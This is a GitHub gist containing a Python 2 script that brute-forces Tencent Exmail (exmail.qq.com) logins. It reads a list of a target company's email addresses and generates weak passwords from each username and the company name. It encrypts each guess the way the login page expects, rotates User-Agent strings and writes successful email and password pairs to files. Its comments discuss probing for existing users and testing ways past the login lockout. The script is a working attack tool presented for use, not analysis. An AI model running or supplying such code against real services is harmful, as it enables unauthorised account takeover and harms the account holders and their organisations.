Created
August 1, 2018 03:18
-
-
Save jjf012/e9cc77067d993579b4bd33666a4684cc to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # author : whoam1 | |
| # blog : http://www.cnnetarmy.com/ | |
| import requests | |
| import re | |
| import rsa | |
| import base64 | |
| import time | |
| import random | |
| import threading | |
| import time | |
| import sys | |
| import smtplib | |
| from email.mime.text import MIMEText | |
| from email.header import Header | |
| requests.packages.urllib3.disable_warnings() | |
| count = 0 | |
| pwd_list = ['%pwd%123','%user%123']#['%pwd%123','%user%123']#,'%user%521','%user%2017','%pwd%321','%pwd%521','%user%321'] | |
| #pwd_list += ['%pwd%123!','%pwd%123!@#','%pwd%1234','%user%2016','%user%123$%^','%user%123!@#'] | |
| #pwd_list += ['%pwd%2016','%pwd%2017','%pwd%1!','%pwd%2@','%pwd%3#','%pwd%123#@!','%pwd%12345'] | |
| #pwd_list += ['%pwd%123$%^','%pwd%!@#456','%pwd%123qwe','%pwd%qwe123','%pwd%qwe','%pwd%123456'] | |
| #pwd_list += ['%user%123#@!','%user%!@#456','%user%1234','%user%12345','%user%123456','%user%123!'] | |
| def brute(email, password, UA, starttime): | |
| global count | |
| url = 'https://exmail.qq.com/cgi-bin/loginpage' | |
| headers = { | |
| 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8', | |
| 'Upgrade-Insecure-Requests': '1', | |
| 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36', | |
| 'Accept-Encoding': 'gzip, deflate, sdch, br', | |
| 'Accept-Language': 'zh-CN,zh;q=0.8'} | |
| s = requests.Session() | |
| req = s.get(url, headers=headers, verify=False) | |
| public_key = re.findall(r'var PublicKey = "(.*?)";', req.content)[0] | |
| ts = re.findall(r'var PublicTs="(.*?)";', req.content)[0] | |
| public_key = rsa.PublicKey(int(public_key, 16), 65537) | |
| res_tmp = rsa.encrypt('{password}\n{ts}\n'.format(password=password, ts=ts), public_key) | |
| p = base64.b64encode(res_tmp) | |
| uin = email.split('@')[0] | |
| domain = email.split('@')[1] | |
| post_data = {} | |
| post_data['sid'] = '' | |
| post_data['firstlogin'] = 'false' | |
| post_data['domain'] = domain | |
| post_data['aliastype'] = 'other' | |
| post_data['errtemplate'] = 'dm_loginpage' | |
| post_data['first_step'] = '' | |
| post_data['buy_amount'] = '' | |
| post_data['year'] = '' | |
| post_data['company_name'] = '' | |
| post_data['is_get_dp_coupon'] = '' | |
| post_data['starttime'] = int(time.time() * 1000) | |
| post_data['redirecturl'] = '' | |
| post_data['f'] = 'biz' | |
| post_data['uin'] = uin | |
| post_data['p'] = p | |
| post_data['delegate_url'] = '' | |
| post_data['ts'] = ts | |
| post_data['from'] = '' | |
| post_data['ppp'] = '' | |
| post_data['chg'] = 0 | |
| post_data['loginentry'] = 3 | |
| post_data['s'] = '' | |
| post_data['dmtype'] = '' | |
| post_data['fun'] = '' | |
| post_data['inputuin'] = email | |
| post_data['verifycode'] = '' | |
| headers['Content-Type'] = 'application/x-www-form-urlencoded' | |
| headers['User-Agent'] = UA | |
| login_url = 'https://exmail.qq.com/cgi-bin/loginpage' | |
| #print '[*] Now is trying...email:%s,password:%s' % (email, password) | |
| try: | |
| while time.time() < starttime: | |
| pass | |
| resp = s.post(url=login_url, headers=headers, data=post_data, verify=False) | |
| # 根据是否绑定微信判定,分别保存和发邮件 | |
| #print len(resp.content) | |
| if (len(resp.content)) < 2000: | |
| count += 1 | |
| if 'var target=\"\"' in resp.content: | |
| print '[!] OK! Get email:%s,password:%s' % (email, password) | |
| key = 'Ok! email:%s,password:%s' % (email, password) | |
| #sendMail(key) | |
| flags = domain.split('.')[0] | |
| with open('brute_ok_%s.txt' % flags,'a')as flag: | |
| flag.write(email) | |
| flag.write(' : ') | |
| flag.write(password) | |
| flag.write('\n') | |
| elif 'loginpage?nocheckframe=true' in resp.content: | |
| print '[!] OK! Get email:%s,password:%s' % (email, password) | |
| flags = domain.split('.')[0] | |
| key = '0ops_wx! email:%s,password:%s' % (email, password) | |
| #sendMail(key) | |
| with open('brute_wx_ok_%s.txt' % flags,'a')as flag: | |
| flag.write(email) | |
| flag.write(' : ') | |
| flag.write(password) | |
| flag.write('\n') | |
| except: | |
| pass | |
| def countt(): | |
| f = open(sys.argv[1], 'r') | |
| return len(f.readlines()) | |
| def main(): | |
| global count,pwd_list | |
| # u = open('user-agents.txt', 'r') | |
| user_agent = ['Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.1) Gecko/20061010 Firefox/2.0', | |
| 'Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.6 Safari/532.0', | |
| 'Mozilla/5.0 (Windows; U; Windows NT 5.1 ; x64; en-US; rv:1.9.1b2pre) Gecko/20081026 Firefox/3.1b2pre', | |
| 'Opera/10.60 (Windows NT 5.1; U; zh-cn) Presto/2.6.30 Version/10.60','Opera/8.01 (J2ME/MIDP; Opera Mini/2.0.4062; en; U; ssr)', | |
| 'Mozilla/5.0 (Windows; U; Windows NT 5.1; ; rv:1.9.0.14) Gecko/2009082707 Firefox/3.0.14', | |
| 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36', | |
| 'Mozilla/5.0 (Windows; U; Windows NT 6.0; fr; rv:1.9.2.4) Gecko/20100523 Firefox/3.6.4 ( .NET CLR 3.5.30729)', | |
| 'Mozilla/5.0 (Windows; U; Windows NT 6.0; fr-FR) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16', | |
| 'Mozilla/5.0 (Windows; U; Windows NT 6.0; fr-FR) AppleWebKit/533.18.1 (KHTML, like Gecko) Version/5.0.2 Safari/533.18.5'] | |
| ''' | |
| UA = random.choice(user_agent) | |
| starttime = time.time() + 1 | |
| user = '' | |
| pwd = '' | |
| brute(user,pwd,UA,starttime) | |
| ''' | |
| tsk = [] | |
| ss = 0 | |
| # pwd_list = [i.strip() for i in open("pwd_list.txt")] #从字典中读取文件,规则如pwd_list. | |
| # pwd_list = ['%pwd%123', '%pwd%521', '%pwd%321', '%pwd%1024', '%pwd%2017'] * 10 # 突破五次次数测试 | |
| # sys.argv[1] 文件命名规则sobug_all_emails.txt,其中sobug是要爆破的厂商域名,对应生成Sobug123等弱密码 | |
| f = open(sys.argv[1], 'r') | |
| level = countt() | |
| for i in f.readlines(): | |
| starttime = time.time() + 1 | |
| count = 0 | |
| ss += 1 | |
| user = i.strip() | |
| print '[ %s/%s ] Now trying : %s' % (ss,level,user), | |
| p = i.split('@')[0].strip().capitalize().replace('_','') | |
| # 密码去掉用户名中的数字 | |
| p = re.sub('\d+','',p) | |
| # pwd_list增加域名弱密码规则 | |
| ur = sys.argv[1].split('_')[0].capitalize() | |
| # 处理名.姓转换规则 | |
| if '.' in p: | |
| deal_user = p.split('.') | |
| xing = deal_user[1].capitalize() | |
| ming = deal_user[0] | |
| p = xing + ming | |
| for j in pwd_list: | |
| pwd = j.replace('%pwd%',p).replace('%user%',ur) | |
| UA = random.choice(user_agent) | |
| # print user,pwd | |
| brute(user,pwd,UA,starttime) | |
| #time.sleep(3) | |
| ''' | |
| t = threading.Thread(target=brute, args=(user, pwd, UA, starttime)) | |
| tsk.append(t) | |
| for t in tsk: | |
| t.setDaemon(True) | |
| t.start() | |
| t.join() | |
| tsk = []''' | |
| print ' count: %s' % count | |
| # 模糊判断top10w,可能存在的用户 | |
| # if count > 9: | |
| # with open('%s_maybe_exmail_user.txt' % ur,'a')as ta: | |
| # ta.write(user) | |
| # ta.write('\n') | |
| # break | |
| if __name__ == '__main__': | |
| main() |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment